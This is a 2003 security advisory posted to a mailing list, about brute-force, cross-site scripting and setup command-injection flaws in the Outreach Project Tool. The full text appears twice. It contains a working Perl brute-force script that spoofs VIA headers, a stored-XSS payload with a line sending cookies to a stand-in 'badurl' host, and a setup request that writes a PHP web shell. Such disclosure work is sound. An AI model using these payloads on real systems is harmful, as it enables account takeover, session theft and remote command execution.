Martin Eiszner
17/01/03, 20:58
to the list,
2003/01/16 @mei@websec.org
=====================================
Outreach Project Tool
=====================================
Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too)
Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html)
Licensse: GPL
VendorStatus: Informed on Oct 2002
VendorStatus: ---
VendorPatch: ---
Local: NO
Remote: YES
Vulnerabilities:
1) Tarpit out-cheat (brute-force attack)
2) Cross-Site-Scripting
3) Setup
Tested Plattforms: Linux / Slackware 8.0 i686 / Apache 1.3.*
Severety: MEDIUM
============
Introduction
============
The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementat
ion. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consult
ants and their clients, as well as a wide range of other applications.
=====================
Vulnerability Details
=====================
SUMMARY
1) Request Header allows Tarpit - out-cheat
2) Multiple XSS-problems in community/forums
3) Setup (/opt/setup) permission issues
B) Description of Vulnerabilities
1) REQUEST-HEADER TARPIT - OUT-CHEAT
The function "OPT_remote_IP()"(/opt/general.php) accepts "X_FORWARDED_FOR" and "VIA"-
environment variables.
This is done to identify possible proxy-servers.
Unfortunately these variables are part of the HTTP-request headers.
the follwoing http-request:
---*---
GET /opt/whatever HTTP/1.1
Host: whatever
VIA: 1.2.3.4
---*---
"$HTTP_VIA" will be used as the users IP.
Thus leading to:
-Anonymous use of the application
-Possibility of a brute-force attack against accounts
Simple example for a brute-force attack against OPT:
---cut here---
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
my ($url,$uid,$pf) = @ARGV;
open(P,"< $pf") || die "passf.?\n";
my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
while(<P>){ my $pwd = $_; chomp($pwd);
my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
my $hds = $res->headers; my $new = $hds->header("Location");
my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
my $cod = $res2->code;
my $pag = $res2->content;
print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
close (P);
---cut here---
2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
Typical XSS vulnerabilities exist in manny/most of the community-functions.
Example:
Once logged in ... goto "Notes -> News -> Ad News"
Then create a News with scripting tags included:
---cut here---
hello i am a news thing .. bla bla ...
<script> alert(document.cookie); </script>
---cut here---
Now every user gets now an alert window with his own session-id.(only as example!!)
Of course it is possible to steal the OPT_Session by requesting
another url where a so called cookie-theft is installed !!
(location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
This vulnerability makes it possible once logged in to steal "any" other users
accounts (administrator included !).
3) SETUP-ISSUES (/opt/setup)
If the lockfile "lock01" in the setup_lock-directory is not removed due to
wrong permission settings or someone is able/allowed to create a file "lock01"
it is possible to:
a) Create a new Setup
b) Execute system-commands thru the setup.php - script.
This is because the "temp_CRM_dir" parameter is passed directly to the PHP-exec function.
Example GET-Request:
---cut here---
http://localhost/opt/setup/setup.php?
CRM_email=opti@localhost
&CRM_system_email=mei@localhost
&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
&CRM_db_host=localhost&CRM_db_uname=opt
&CRM_db_pwd=opt
&CRM_db_db=opt
&CRM_may_demo=0
&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+ba d.php;
&CRM_mail_fname=OPT_incoming_mail
&action=Set up my OPT server
---cut here---
Above will create a script called "bad.php" with content(<?passthru($c)?>)in the
OPT-setup directory !
=======
Remarks
=======
---
====================
Recommended Hotfixes
====================
After installation check if file "lock01" exists in setup_lock-directory.
if yes, remove it.
The other vulnerabilities can only be fixed by sw-patches.
EOF Martin Eiszner / @2002WebSec.org
=======
Contact
=======
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
2003/01/16 @mei@websec.org
=====================================
Outreach Project Tool
=====================================
Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too)
Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html)
Licensse: GPL
VendorStatus: Informed on Oct 2002
VendorStatus: ---
VendorPatch: ---
Local: NO
Remote: YES
Vulnerabilities:
1) Tarpit out-cheat (brute-force attack)
2) Cross-Site-Scripting
3) Setup
Tested Plattforms: Linux / Slackware 8.0 i686 / Apache 1.3.*
Severety: MEDIUM
============
Introduction
============
The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementat
ion. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consult
ants and their clients, as well as a wide range of other applications.
=====================
Vulnerability Details
=====================
SUMMARY
1) Request Header allows Tarpit - out-cheat
2) Multiple XSS-problems in community/forums
3) Setup (/opt/setup) permission issues
B) Description of Vulnerabilities
1) REQUEST-HEADER TARPIT - OUT-CHEAT
The function "OPT_remote_IP()"(/opt/general.php) accepts "X_FORWARDED_FOR" and "VIA"-
environment variables.
This is done to identify possible proxy-servers.
Unfortunately these variables are part of the HTTP-request headers.
the follwoing http-request:
---*---
GET /opt/whatever HTTP/1.1
Host: whatever
VIA: 1.2.3.4
---*---
"$HTTP_VIA" will be used as the users IP.
Thus leading to:
-Anonymous use of the application
-Possibility of a brute-force attack against accounts
Simple example for a brute-force attack against OPT:
---cut here---
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
my ($url,$uid,$pf) = @ARGV;
open(P,"< $pf") || die "passf.?\n";
my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
while(<P>){ my $pwd = $_; chomp($pwd);
my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
my $hds = $res->headers; my $new = $hds->header("Location");
my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
my $cod = $res2->code;
my $pag = $res2->content;
print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
close (P);
---cut here---
2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
Typical XSS vulnerabilities exist in manny/most of the community-functions.
Example:
Once logged in ... goto "Notes -> News -> Ad News"
Then create a News with scripting tags included:
---cut here---
hello i am a news thing .. bla bla ...
<script> alert(document.cookie); </script>
---cut here---
Now every user gets now an alert window with his own session-id.(only as example!!)
Of course it is possible to steal the OPT_Session by requesting
another url where a so called cookie-theft is installed !!
(location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
This vulnerability makes it possible once logged in to steal "any" other users
accounts (administrator included !).
3) SETUP-ISSUES (/opt/setup)
If the lockfile "lock01" in the setup_lock-directory is not removed due to
wrong permission settings or someone is able/allowed to create a file "lock01"
it is possible to:
a) Create a new Setup
b) Execute system-commands thru the setup.php - script.
This is because the "temp_CRM_dir" parameter is passed directly to the PHP-exec function.
Example GET-Request:
---cut here---
http://localhost/opt/setup/setup.php?
CRM_email=opti@localhost
&CRM_system_email=mei@localhost
&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
&CRM_db_host=localhost&CRM_db_uname=opt
&CRM_db_pwd=opt
&CRM_db_db=opt
&CRM_may_demo=0
&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+ba d.php;
&CRM_mail_fname=OPT_incoming_mail
&action=Set up my OPT server
---cut here---
Above will create a script called "bad.php" with content(<?passthru($c)?>)in the
OPT-setup directory !
=======
Remarks
=======
---
====================
Recommended Hotfixes
====================
After installation check if file "lock01" exists in setup_lock-directory.
if yes, remove it.
The other vulnerabilities can only be fixed by sw-patches.
EOF Martin Eiszner / @2002WebSec.org
=======
Contact
=======
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org